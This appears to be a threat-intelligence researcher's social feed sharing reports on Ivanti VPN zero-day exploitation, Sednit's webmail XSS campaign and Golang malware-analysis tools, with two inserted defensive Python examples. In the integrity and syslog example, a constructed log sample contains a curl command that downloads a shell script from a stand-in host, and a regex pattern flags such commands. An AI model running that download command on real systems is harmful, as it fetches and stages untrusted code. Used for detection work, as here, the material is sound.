132 Followers
70 Following
38 Posts
Threats n stuff.

@volexity has released updates to its #opensource GoResolver project and other #golang tools! This work was part of a project for one of our #summerinternship students. Read more details about this project in our special blog post: https://www.volexity.com/blog/2025/08/11/go-get-em-updates-to-volexity-golang-tooling/

We are proud to contribute to the open source community + work alongside students in our annual #internship program! If you would like to learn more about internships at Volexity, check out our program details here: https://www.volexity.com/internships/

#threatintel #malwareanalysis

Go Get 'Em: Updates to Volexity Golang Tooling

Volexity’s GoResolver tool was released in April 2025 to help with analysis of these samples, reducing analyst load when working with obfuscated Golang binaries. However, there are still some difficulties when working with Golang samples, even in the absence of obfuscation. Challenges include organization of string information and propagation of runtime type information. To ease these challenges Volexity has released a new utility, GoStringExtractor, and added functionality to the existing GoResolver tool.

Volexity
#ESETresearch publishes its investigation of Operation RoundPress, which uses XSS vulnerabilities to target high-value webmail servers. We attribute the operation to Sednit with medium confidence. https://www.welivesecurity.com/en/eset-research/operation-roundpress/
In 2023, Operation RoundPress only targeted Roundcube, but in 2024 it expanded to other webmail software including Horde, MDaemon, and Zimbra. For MDaemon, Sednit exploited the zero-day XSS vulnerability CVE-2024-11182.
Most victims were governmental entities and defense companies in Eastern Europe, although we have observed governments in Africa, Europe, and South America being targeted as well.
Our blogpost provides an analysis of the JavaScript payloads, which we named SpyPress. They are able to steal webmail credentials, and exfiltrate contacts and email messages from the victim’s mailbox. IoCs available in our GitHub repo: https://github.com/eset/malware-ioc/tree/master/operation_roundpress 5/5
Operation RoundPress targeting high-value webmail servers

ESET researchers uncover a Russia-aligned espionage operation that they named RoundPress and that targets webmail servers via XSS vulnerabilities.

We are very excited to announce that Volatility 3 has reached parity with Volatility 2! With this achievement, Volatility 2 is now deprecated. See the full details in our blog post: https://volatilityfoundation.org/announcing-the-official-parity-release-of-volatility-3/
Announcing the Official Parity Release of Volatility 3!


The Volatility Foundation - Promoting Accessible Memory Analysis Tools Within the Memory Forensics Community
In the course of its investigations, @volexity frequently encounters malware samples written in Golang. This reflects the increase in popularity of Golang generally, and presents challenges to reverse engineering tools.
 
Today, @volexity is releasing GoResolver, open-source tooling to help reverse engineers understand obfuscated samples. @r00tbsd & Killian Raimbaud presented details at INCYBER Forum earlier today.
 
GoResolver uses control-flow graph similarity to identify library code in obfuscated code, leaving analysts with only malware functions to analyze. This saves time & speeds up investigations!
 
Check out the blog post on how GoResolver works and where to download it: https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/
 
#dfir #reversing #malwareanalysis
GoResolver: Using Control-flow Graph Similarity to Deobfuscate Golang Binaries, Automatically

In the course of its investigations, Volexity frequently encounters malware samples written in Golang. Binaries written in Golang are often challenging to analyze because of the embedded libraries and the sheer size of the resulting binaries. This issue is amplified when samples are obfuscated using tools such as Garble, an open-source Golang obfuscation tool. The popularity of Golang amongst malware developers, and the use of obfuscators to make reverse-engineering harder, raised the need for better tooling to assist in reverse-engineering efforts. Volexity developed GoResolver, an open-source tool...

Volexity
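The post above describes GoResolver matching library code by control-flow graph similarity. The following is an added illustration of that idea in Python; it is not GoResolver's code, and the block names, the "library" and "malware" functions, the Weisfeiler-Lehman style fingerprint and the 0.8 threshold are all constructed assumptions. It shows why renaming symbols and blocks (what an obfuscator does) leaves the graph shape, and therefore the match, intact, while a function of a different shape is left for the analyst.

```python
"""Toy control-flow-graph similarity matcher (added example, not GoResolver)."""
import hashlib
from collections import Counter


def wl_fingerprint(cfg, rounds=3):
    """Structural fingerprint of a CFG given as {block: [successor blocks]}.

    Block names are ignored; only in/out-degree and neighbourhood shape feed
    the labels, so renaming blocks (as an obfuscator does) gives the same
    fingerprint.  Labels are refined Weisfeiler-Lehman style for `rounds`
    iterations and every round's label multiset is accumulated.
    """
    nodes = set(cfg) | {s for succs in cfg.values() for s in succs}
    preds = {n: [] for n in nodes}
    for n, succs in cfg.items():
        for s in succs:
            preds[s].append(n)
    # initial label: "in-degree:out-degree"
    labels = {n: f"{len(preds[n])}:{len(cfg.get(n, []))}" for n in nodes}
    fp = Counter(labels.values())
    for _ in range(rounds):
        refined = {}
        for n in nodes:
            succ_labels = ",".join(sorted(labels[s] for s in cfg.get(n, [])))
            digest = hashlib.sha256(f"{labels[n]}|{succ_labels}".encode()).hexdigest()
            refined[n] = digest[:8]
        labels = refined
        fp.update(labels.values())
    return fp


def similarity(a, b):
    """Multiset Jaccard similarity between two fingerprints (0.0 .. 1.0)."""
    inter = sum((a & b).values())
    union = sum((a | b).values())
    return inter / union if union else 0.0


def build_library(reference_cfgs):
    """Precompute fingerprints for known (e.g. Go runtime/stdlib) functions."""
    return {name: wl_fingerprint(cfg) for name, cfg in reference_cfgs.items()}


def classify(unknown_cfg, library, threshold=0.8):
    """Return (library_name, score) if the unknown function matches a known
    one at or above `threshold`, else (None, best_score)."""
    fp = wl_fingerprint(unknown_cfg)
    best_name, best_score = None, 0.0
    for name, ref_fp in library.items():
        score = similarity(fp, ref_fp)
        if score > best_score:
            best_name, best_score = name, score
    return (best_name, best_score) if best_score >= threshold else (None, best_score)


# Constructed reference: a small search loop (entry -> cond -> body -> found/exit).
REFERENCE_CFGS = {
    "stdlib.search_loop_example": {
        "entry": ["cond"],
        "cond": ["body", "exit"],
        "body": ["found", "cond"],
        "found": ["exit"],
        "exit": [],
    },
}

# Constructed "obfuscated" copy: identical shape, meaningless block names.
OBFUSCATED_LIBRARY_FUNC = {
    "b0": ["b1"],
    "b1": ["b2", "b4"],
    "b2": ["b3", "b1"],
    "b3": ["b4"],
    "b4": [],
}

# Constructed "malware" function: two stacked if/else diamonds, no loop.
MALWARE_FUNC = {
    "m0": ["m1", "m2"],
    "m1": ["m3"],
    "m2": ["m3"],
    "m3": ["m4", "m5"],
    "m4": ["m6"],
    "m5": ["m6"],
    "m6": [],
}

if __name__ == "__main__":
    lib = build_library(REFERENCE_CFGS)
    print("obfuscated copy ->", classify(OBFUSCATED_LIBRARY_FUNC, lib))
    print("malware function ->", classify(MALWARE_FUNC, lib))
```

Real tooling fingerprints far more than degree counts (basic-block sizes, call targets, constants) and has to cope with compiler-level differences between Go versions, which is why a threshold rather than exact equality is used; the point here is only that the comparison is keyed on structure, not on the names an obfuscator strips.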

In this blog post, Michael Hale Ligh & Andrew Case (@attrc) break down how @volexity used #memoryforensics to discover two #0days being chained together to achieve unauthenticated remote code execution in Ivanti Connect Secure VPN devices. More details here: https://www.volexity.com/blog/2024/02/01/how-memory-forensics-revealed-exploitation-of-ivanti-connect-secure-vpn-zero-day-vulnerabilities

#dfir #threatintel

Last week, we shared details concerning a threat actor (UTA0178) exploiting #Ivanti Connect Secure 0-days. Initially few devices were compromised. Since Thursday, the exploitation has gone global. We identified over 1700 compromised appliances in the world.

All sectors are concerned: small and big organizations, private and public. If you haven't already done so, apply the mitigation provided by the vendor. Run the integrity checker tool to check if you have any mismatches... More details: https://www.volexity.com/blog/2024/01/15/ivanti-connect-secure-vpn-exploitation-goes-global/

#threatintel #threatintelligence

Ivanti Connect Secure VPN Exploitation Goes Global

On January 10, 2024, Volexity publicly shared details of targeted attacks by UTA0178 exploiting two zero-day vulnerabilities (CVE-2024-21887 and CVE-2023-46805) in Ivanti Connect Secure (ICS) VPN appliances. On the same day, Ivanti published a mitigation that could be applied to ICS VPN appliances to prevent exploitation of these vulnerabilities. Since publication of these details, Volexity has continued to monitor its existing customers for exploitation. Volexity has also been contacted by multiple organizations that saw signs of compromise by way of mismatched file detections. Volexity has been actively working multiple new cases of organizations with compromised ICS VPN appliances.

Volexity

End of last year we worked on an incident response where a TA exploited two 0-days to compromise Ivanti Connect Secure (previously Pulse Connect Secure).

The first vulnerability (CVE-2023-46805) was abused to bypass the authentication. The second vulnerability (CVE-2024-21887) was used to execute commands on the device.

The TA remounted the filesystem to enable write permissions. Then, the attackers modified an existing JavaScript and deployed two webshells.

They modified lastauthserverused.js, a script that is legitimately used in the logon page. The modification exfiltrates the username and the password. The two webshells use the HTTP request parameters to execute code.

Takeaways: monitor your network (outbound connections via curl were performed on multiple occasions), check your logs (store your logs outside of the appliance via syslog), use the built-in integrity checker tool.
More details & IOCs in our blog post: https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/

#Threatintel #Threatintelligence #Ivanti

Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN

Volexity has uncovered active in-the-wild exploitation of two vulnerabilities allowing unauthenticated remote code execution in Ivanti Connect Secure VPN appliances. An official security advisory and knowledge base article have been released by Ivanti that includes mitigation that should be applied immediately. However, a mitigation does not remedy a past or ongoing compromise. Systems should simultaneously be thoroughly analyzed per details in this post to look for signs of a breach.

Volexity
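The posts above recommend two defensive checks: run an integrity check for mismatched files on the appliance, and review logs shipped off-box via syslog for outbound curl connections. The block below is an added example in Python that implements the two checks in their simplest form; it is not Ivanti's integrity checker, not Volexity's code, and the directory layout, the baseline manifest, the constructed syslog lines and the TEST-NET addresses in them are all assumptions. Only the file name lastauthserverused.js comes from the post.

```python
"""Added example: baseline-hash integrity check and syslog scan for outbound curl."""
import hashlib
import re
import tempfile
from pathlib import Path


def hash_tree(root):
    """Map each regular file under `root` (relative POSIX path) to its SHA-256."""
    root = Path(root)
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def compare_to_baseline(baseline, current):
    """Report files whose hash changed, files not in the baseline, and files
    missing from the current tree.  Any non-empty list is a 'mismatch'."""
    return {
        "modified": sorted(f for f in baseline if f in current and baseline[f] != current[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


# A curl invocation followed somewhere on the line by an http(s) URL.
CURL_URL_RE = re.compile(r"\bcurl\b.*?(https?://\S+)")


def find_outbound_curl(log_lines):
    """Return (timestamp, host, url) for syslog-style lines that show curl
    reaching out to a URL.  Assumes the classic 'Mon DD HH:MM:SS host tag: msg'
    layout; lines that do not match it are skipped rather than mis-parsed."""
    hits = []
    for line in log_lines:
        parts = line.split(maxsplit=4)
        if len(parts) < 5:
            continue
        match = CURL_URL_RE.search(parts[4])
        if match:
            timestamp = " ".join(parts[:3])
            hits.append((timestamp, parts[3], match.group(1)))
    return hits


# Constructed syslog lines (TEST-NET addresses, not real infrastructure).
SAMPLE_SYSLOG = [
    "Jan 14 03:12:07 vpn-gw cron[812]: job finished",
    "Jan 14 03:12:09 vpn-gw sh[901]: curl -s http://203.0.113.25/x.sh -o /tmp/x.sh",
    "Jan 14 03:12:11 vpn-gw web[77]: GET /index.html 200",
    "Jan 14 03:13:40 vpn-gw sh[904]: curl https://198.51.100.7:8443/ping",
    "not a syslog line at all",
]


def run_demo():
    """Build a known-good tree, snapshot it, tamper with it the way the post
    describes (edit a logon-page script, drop a new file), and run both checks."""
    root = Path(tempfile.mkdtemp(prefix="ics-demo-"))
    (root / "logon").mkdir()
    (root / "logon" / "lastauthserverused.js").write_text("// constructed original script\n")
    (root / "logon" / "welcome.html").write_text("<html>constructed</html>\n")
    baseline = hash_tree(root)  # the manifest a vendor tool would ship

    # Simulated tampering: modified logon script plus an unexpected new file.
    (root / "logon" / "lastauthserverused.js").write_text("// constructed modified script\n")
    (root / "logon" / "new_helper.js").write_text("// constructed unexpected file\n")

    return {
        "integrity": compare_to_baseline(baseline, hash_tree(root)),
        "curl": find_outbound_curl(SAMPLE_SYSLOG),
    }


if __name__ == "__main__":
    result = run_demo()
    print("integrity mismatches:", result["integrity"])
    for ts, host, url in result["curl"]:
        print(f"{ts} {host}: outbound curl to {url}")
```

The baseline manifest only helps if it was captured (or supplied by the vendor) before compromise and stored off the device, and the log scan only sees what was shipped off-box before an attacker could edit local logs; both points are why the post pairs the checks with forwarding logs via syslog.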
Releases · volatilityfoundation/volatility3

Volatility 3.0 development. Contribute to volatilityfoundation/volatility3 development by creating an account on GitHub.

GitHub
Don't miss @tlansec's talk at 12:00 BST tomorrow, Oct 5, at #VB2023 in London! He will share @volexity's research and observations of a North Korean #apt using unique, persistent #socialengineering techniques to target victims. More here: https://www.virusbulletin.com/conference/vb2023/abstracts/sharptongue-pwning-your-foreign-policy-one-interview-request-time/ #threatintel #dfir
Virus Bulletin :: SharpTongue: pwning your foreign policy, one interview request at a time

VB2023 paper: SharpTongue: pwning your foreign policy, one interview request at a time

ICYMI, on Friday our team @volexity put out a report on APT activity targeting mobile devices (Android and likely iOS). The attackers distributed the malware by creating purpose-built websites, online communities and fake personas to assist in distribution.

https://www.volexity.com/blog/2023/09/22/evilbamboo-targets-mobile-devices-in-multi-year-campaign/

EvilBamboo Targets Mobile Devices in Multi-year Campaign

Volexity has identified several long-running and currently active campaigns undertaken by the threat actor Volexity tracks as EvilBamboo (formerly named Evil Eye) targeting Tibetan, Uyghur, and Taiwanese individuals and organizations. These targets represent three of the Five Poisonous Groups of Chinese Communist Party (CCP).

Volexity